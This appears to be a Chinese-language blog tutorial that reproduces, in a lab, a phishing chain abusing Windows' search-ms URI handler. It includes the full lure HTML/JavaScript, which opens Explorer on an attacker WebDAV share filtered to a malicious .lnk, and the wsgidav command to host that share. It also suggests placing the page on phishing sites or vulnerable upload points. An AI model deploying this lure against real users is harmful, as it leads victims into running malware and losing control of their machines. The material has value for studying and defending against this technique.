html釣魚姿勢分享

0x00 實驗環境

靶場：全新的windows筆記本，kali

 

0x01 實驗前提

（1）學習國外大佬的文章

攻擊鏈：

Email --> invoice.pdf --> 包含一個鏈接 --> search-ms:query=decoy&crumb=location:\\\\127.0.0.1@5000\\dec&displayname=Hello,is it me you\'re looking for? --> invoice.lnk --> beacon.exe -->beacon.dll

（2）動手實戰

文章一分鐘，復現半小時

 

0x02 實驗步驟

（1）根據釣魚的思路，首先發一封email郵件，這裏省去發釣魚郵件的過程。直接從包含一個鏈接開始。

如下是老外的示例網站：

https://dav.binary-offensive.com/webdav/searchms.html

 

當我們去訪問的時候，頁面會要求我們打開資源管理器。先點擊取消，右鍵查看源代碼。可以看到這裏是通過search-ms:query=test&crumb的方式來打開遠程服務器上的文件，並且只會顯示test命名的文件。

 

其實這裏的search-ms:query=test&crumb和我們直接使用exploerer.exe打開是差不多的。我們現在點擊打開。可以看到他會自動打開資源管理器，裏面只會顯示一個test命名的文件，其他文件是不會顯示的：

 

（2）那麼如果我們自己去搭建一個這樣的html頁面，然後我們只顯示lnk文件其他文件都不顯示的話，當目標點擊lnk文件的時候會執行我們的白程序，然後去調用我們的黑dll。但是在這之前我們需要去搭建一個WebDav來託管我們的文件，在kali安裝以下工具包：

apt-get install python3-wsgidav

WSGI是什麼？

WSGI，全稱 Web Server Gateway Interface，或者 Python Web Server Gateway Interface ，是爲 Python 語言定義的 Web 服務器和 Web 應用程序或框架之間的一種簡單而通用的接口。自從 WSGI 被開發出來以後，許多其它語言中也出現了類似接口。

WebDAV 是什麼？

WebDAV（Web Dub）是一種技術和功能，可以使用Web服務器進行文件共享和編輯，目前可用於許多租賃服務器計劃，還有用戶自己設置VPS等方法。

WebDAV類似於當前流行的Google Drive等在線存儲服務，雲上的多個用戶可以相對安全地進行文件共享和編輯。

 

（3）現在我們還需要去仿照老外的頁面去做一個一模一樣的頁面即可。

如下代碼：這裏的192.168.31.242是我的kali ip，dec是目錄，這裏的query參數查詢的是以lnk命名文件。

<html>
<head>
<title>search-ms</title>
<script>
window.location.href = 'search-ms:query=lnk&crumb=location:\\\\192.168.31.242@5000\\dec&displayname=Hello, is it me you\'re looking for?';
</script>
</head>
<body>
<center>
PoC triggering Microsoft's <b>search-ms</b> URI handler to open
up Explorer previewing attacker's WebDAV contents.</br>
This is to lure victims into opening malicious files which could
have led to their computers infection.<br/>
</center>
</body>
</html>

（4）開啓服務：在當前路徑下開啓5000端口。設置認證爲匿名認證：

wsgidav --port=5000 --host=0.0.0.0 --root=./ --auth=anonymous

 

（5）可以看到，當我們去訪問test.html時，會提示我們是否打開這個頁面，這裏因爲是本地，我們直接雙擊打開，所以這裏是file://想要打開應用程序，一般的話我們掛在我們的釣魚網站即可，或者掛載在比如說有漏洞的地方，可以上傳html文件的地方都是可以的。

 

 

（6）當我們去點擊打開的時候。可以看到頁面會顯示一個1.lnk文件，因爲這個文件我們沒做任何處理，所以是沒有圖標的。 

 

0x03 一些思考

（1）以前說上傳文件不能getshell的場景，用處都不大，現在發現只是因爲自己瞭解的知識太少了；

（2）有的電腦運行html並不能成功打開資源管理器，可能是谷歌版本太低導致；

（3）多學習外國佬的文章，會漲很多姿勢。